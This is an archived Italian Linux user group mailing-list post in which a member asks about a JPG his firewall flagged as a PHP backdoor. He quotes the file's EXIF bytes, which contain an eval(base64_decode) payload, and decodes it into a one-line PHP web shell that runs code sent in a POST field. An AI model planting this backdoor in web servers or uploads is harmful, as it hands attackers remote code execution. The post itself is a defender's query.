[linux_var] VIRUS JPG con codice PHP ?

To: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Subject: [linux_var] VIRUS JPG con codice PHP ?

From: Giovanni Orlandi <orlangio@gmail.com>

Date: Wed, 11 Oct 2017 11:51:25 +0200

Authentication-results: linuxvar.it; dkim=pass reason="2048-bit key; unprotected key" header.d=gmail.com header.i=@gmail.com header.b=tizGp+G2; dkim-adsp=pass; dkim-atps=neutral

Delivered-to: diegor@tiscali.it

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ml.linuxvar.it; s=mail; t=1507715485; bh=uvCQYj2U7Jluemk1dncwgdtd7XsI28g2U5KNU2uwzJE=; h=From:Date:To:Subject:List-Id:List-Unsubscribe:List-Archive: List-Post:List-Help:List-Subscribe:Reply-To; z=From:=20Giovanni=20Orlandi=20<orlangio@gmail.com>|Date:=20Wed,=20 11=20Oct=202017=2011:51:25=20+0200|To:=20linux_var=20-=20LUG=20di= 20Varese=20e=20Provincia=20Mailing=20List=20<talking@ml.linuxvar.i t>|Subject:=20[linux_var]=20VIRUS=20JPG=20con=20codice=20PHP=20?|L ist-Id:=20linux_var=20-=20LUG=20di=20Varese=20e=20Provincia=20Mail ing=20List=0D=0A=20<talking.ml.linuxvar.it>|List-Unsubscribe:=20<h ttp://ml.linuxvar.it/cgi-bin/mailman/options/talking>,=0D=0A=20<ma ilto:talking-request@ml.linuxvar.it?subject=3Dunsubscribe>|List-Ar chive:=20<http://ml.linuxvar.it/pipermail/talking/>|List-Post:=20< mailto:talking@ml.linuxvar.it>|List-Help:=20<mailto:talking-reques t@ml.linuxvar.it?subject=3Dhelp>|List-Subscribe:=20<http://ml.linu xvar.it/cgi-bin/mailman/listinfo/talking>,=0D=0A=20<mailto:talking -request@ml.linuxvar.it?subject=3Dsubscribe>|Reply-To:=20linux_var =20-=20LUG=20di=20Varese=20e=20Provincia=20Mailing=20List=0D=0A=20 <talking@ml.linuxvar.it>; b=d1o0cbi66gSMVigOpSEYLmyjqiQvM9Gzt4iSpJU6s+5Tkb/fUV/hQ2dy+n5UptOwK TBDGUI1vOy+oSze68s/ucDT2E4cYRn4jKjIAfdzEBaZzZTvXlWEKpaf8ZX8vPgaEnz 9vqO45qf3U8wxUTXUqdg1UN5e/yJDAdFe7uRfOIg=

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20161025; h=mime-version:from:date:message-id:subject:to; bh=f098QUSvBgZcqEyTMyHqkYKIF9IWBG60xxOqXw6LnlA=; b=tizGp+G2Hh0JtHTD1B92RlVBVqVW8FLfHxPEzNyzwonBDk/E5ySKTFqtytbuD3lIke FuRJqts9VnJmVpNz+cT843zydSKh10hD5IxkQ2ny/MNIi7LwZVPtPzAaLR0YnzNdWEg1 hl86d0ENwKywiVx3D4hA5ZHlV3BVY68c6bU74lztWcWjCkzLN4OkBmSwrBIFmVsqy9gt aZsGltNvkQxFobjjLT6X32/616sqHXvtfiysfx4QlHSicFvFOt86SMwf0nQ6dDJ4/Hrt CD08oQIGTKG++2cSJi6Xujvk8n95VFTJGhyfIgWjV1Kf2CVHxle8KhkB5xbaLVoAgbAM jjVA==

List-archive: <http://ml.linuxvar.it/pipermail/talking/>

List-help: <mailto:talking-request@ml.linuxvar.it?subject=help>

List-id: linux_var - LUG di Varese e Provincia Mailing List <talking.ml.linuxvar.it>

List-post: <mailto:talking@ml.linuxvar.it>

List-subscribe: <http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>, <mailto:talking-request@ml.linuxvar.it?subject=subscribe>

List-unsubscribe: <http://ml.linuxvar.it/cgi-bin/mailman/options/talking>, <mailto:talking-request@ml.linuxvar.it?subject=unsubscribe>

Reply-to: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Sender: "Talking" <talking-bounces@ml.linuxvar.it>

Ciao,

analizzando i log del firewall aziendale ho trovato bloccato il download sul PC

di una immagine jpg (fortunatamente da un server esterno)

AntiVirus

Profile Name	default
Virus/Botnet	PHP/Agent.VD!tr.bdr
Virus ID	5380326
Reference	http://www.fortinet.com/ve?vn=PHP%2FAgent.VD%21tr.bdr
Detection Type	Virus
Direction	incoming
Quarantine Skip	File-was-not-quarantined.
FortiSandbox Checksum	1552666804a9e84d3da6741fdf81d7b20206b15d46fd3e73fd9e51c6e822e706
Submitted to FortiSandbox	false
Message	File is infected.

Questo è il contenuto iniziale della jpg aperta in modo brutale con vim:

ÿØÿà^@^PJFIF^@^A^A^A^@H^@H^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e

^@eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));^@ÿÛ^@C^@^E^C^D^D^D^C^E^D^D

il base64_decode diventa:

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

senz'altro pericoloso se dentro un file php sul server

ma dentro una jpg ?

Non mi pare che lo scarico di quella immagine su di un PC (windows) possa portare alcun pericolo,

semmai il suo upload su di un server, che però dovrebbe "eseguire" del codice php dentro una immagine jpg ?!?!?!

Qualcuno conosce il problema e mi può dare + informazioni ?

Grazie,

Giovanni

-----------------------------------------------------------------------------------------
Luca 18,5 : "Poiché questa vedova è così molesta le farò giustizia, perché non venga continuamente a importunarmi".
Neemia 8,10 : "...questo giorno è consacrato al nostro Signore; non siate tristi; perché la gioia del Signore è la vostra forza".
GSM 345.6050488 / 327.0547392 / 392.0698126 - Fax 06.62204735

_______________________________________________ Talking mailing list Talking@ml.linuxvar.it http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking

Follow-Ups:

Re: [linux_var] VIRUS JPG con codice PHP ?
- From: Riccardo Macoratti <r.macoratti@gmx.co.uk>